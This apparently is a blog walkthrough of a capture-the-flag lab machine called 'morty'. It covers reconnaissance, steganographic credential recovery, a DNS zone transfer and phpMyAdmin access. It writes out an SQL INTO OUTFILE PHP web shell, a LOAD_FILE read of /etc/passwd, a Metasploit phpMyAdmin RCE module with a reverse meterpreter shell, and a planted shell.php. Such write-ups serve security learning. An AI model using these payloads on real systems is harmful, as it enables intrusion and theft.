ptd-morty-private

.

┌─[✗]─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat allports.nmap 
# Nmap 7.91 scan initiated Fri Mar 5 15:11:41 2021 as: nmap -A -oN allports.nmap 10.150.150.57
Nmap scan report for mortysserver.com (10.150.150.57)
Host is up (0.031s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 e8:60:09:66:aa:1f:e8:76:d8:84:16:18:1c:e4:ee:32 (RSA)
| 256 92:09:d3:0e:f9:47:48:03:9f:32:9f:0f:17:87:c2:a4 (ECDSA)
|_ 256 1d:d1:b3:2b:24:dc:c2:8a:d7:ca:44:39:24:c3:af:3d (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid: 
|_ bind.version: 9.16.1-Ubuntu
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 5 15:11:58 2021 -- 1 IP address (1 host up) scanned in 16.41 seconds
┌─[user@parrot-virtual]─[~/ptd/morty]

.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $curl http://10.150.150.57/note.html
Morty, <br>
if you read this: I've already configured your domain 'mortysserver.com' on this server, don't bother me with it anymore!!
<br>
-Rick 
┌─[user@parrot-virtual]─[~/ptd/morty]

.add  10.150.150.57 mortyserver to /etc/hosts

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat secret.txt 
Fl4sk#!
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $md5sum screen.jpeg
df7eb9983c329c32408c5a6be270b3f1  screen.jpeg
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide --info screen.jpeg
"screen.jpeg":
format: jpeg
capacity: 10.4 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase: 
embedded file "keytotheuniverse.txt":
size: 24.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $steghide extract -sf screen.jpeg 
Enter passphrase: Fl4sk#!
wrote extracted data to "keytotheuniverse.txt".
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $ls -la
total 212
drwxr-xr-x 1 user user 108 Mar 11 11:12 .
drwxr-xr-x 1 user user 2164 Mar 5 15:10 ..
-rw-r--r-- 1 user user 1016 Mar 5 15:11 allports.nmap
-rw-r--r-- 1 user user 24 Mar 11 11:12 keytotheuniverse.txt
-rw-r--r-- 1 user user 204432 Mar 8 09:32 screen.jpeg
-rw-r--r-- 1 user user 9 Mar 11 11:11 secret.txt
┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $cat keytotheuniverse.txt 
rick:WubbaLubbaDubDub1!


.

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57
; (1 server found)
;; global options: +cmd
;; Query time: 33 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:46:00 GMT 2021
;; MSG SIZE rcvd: 56

┌─[user@parrot-virtual]─[~/ptd/morty]
└──╼ $dig axfr @10.150.150.57 mortysserver.com

; <<>> DiG 9.16.8-Debian <<>> axfr @10.150.150.57 mortysserver.com
; (1 server found)
;; global options: +cmd
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
mortysserver.com. 900 IN NS 10.150.150.57.
rickscontrolpanel.mortysserver.com. 900 IN A 10.150.150.57
mortysserver.com. 900 IN SOA 10.150.150.57. email.mortysserver.com. 1 900 900 604800 900
;; Query time: 29 msec
;; SERVER: 10.150.150.57#53(10.150.150.57)
;; WHEN: Fri Mar 12 11:47:13 GMT 2021
;; XFR size: 4 records (messages 1, bytes 212)

┌─[user@parrot-virtual]─[~/ptd/morty]

We add to our /etc/hosts : 10.150.150.57 mortysserver.com rickscontrolpanel.mortysserver.com email.mortysserver.com

.

We access http://rickscontrolpanel.mortysserver.com

and find FLAG1=921e4db975bda77543cfe83fbe176d15e09ce7e2

We logon to this phpmyadmin site as rick:WubbaLubbaDubDub1!

and find

FLAG2=e39c995fbf614c5c38ca7343f59cc310e5880251

.

in phpmyadmin create database 1st, then execute query :

 SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/backdoor.php"

.

we get

Error

SQL query: Documentation

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/backdoor.php"

MySQL said: Documentation
#1 - Can't create/write to file '/var/www/backdoor.php' (Errcode: 13 "Permission denied")

.So we can’t write there ( writing in \tmp is allowed )

.

.

SELECT LOAD_FILE (‘/etc/passwd’);

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin
apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin 
pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
morty:x:1000:1000:Morty Smith:/home/morty:/bin/bash 
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false bind:x:112:118::/var/cache/bind:/usr/sbin/nologin
mysql:x:113:119:MySQL Server,,,:/nonexistent:/bin/false

wappalyzer shows phpmyadmin = version 4.8.1

We can then use https://medium.com/@happyholic1203/phpmyadmin-4-8-0-4-8-1-remote-code-execution-257bcc146f8e#:~:text=from%20PMA%204.8.-,0%20~%204.8.,PHP%20code%20on%20the%20server

or use metesploit module : multi/http/phpmyadmin_lfi_rce

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > show options

Module options (exploit/multi/http/phpmyadmin_lfi_rce):

Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD WubbaLubbaDubDub1! no Password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.150.150.57 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base phpMyAdmin directory path
USERNAME rick yes Username to authenticate with
VHOST rickscontrolpanel.mortysserver.com no HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.66.66.42 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Automatic
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.66.66.42:4444 
msf6 exploit(multi/http/phpmyadmin_lfi_rce) > [*] Sending stage (39282 bytes) to 10.150.150.57
[*] Meterpreter session 1 opened (10.66.66.42:4444 -> 10.150.150.57:42974) at 2021-03-13 14:58:15 +0000

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -l

Active sessions
===============

  Id  Name  Type                   Information            Connection
  --  ----  ----                   -----------            ----------
  1         meterpreter php/linux  www-data (33) @ morty  10.66.66.42:4444 -> 10.150.150.57:42974 (10.150.150.57)

msf6 exploit(multi/http/phpmyadmin_lfi_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 9802 created.
Channel 0 created.


cd user/morty

cat FLAG3.txt
73ce6cecfc1109f1e43d379fd9922dcc699af321

Later found the i could write to

echo '<?php system($_GET['cmd']); ?>' > shell.php
pwd
/var/www/html/rickscontrolpanel/public_html/phpmyadmin

and then access

http://rickscontrolpanel.mortysserver.com/shell.php?cmd=whoami

 

Author : Puckiestyle

 

 

 

 

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *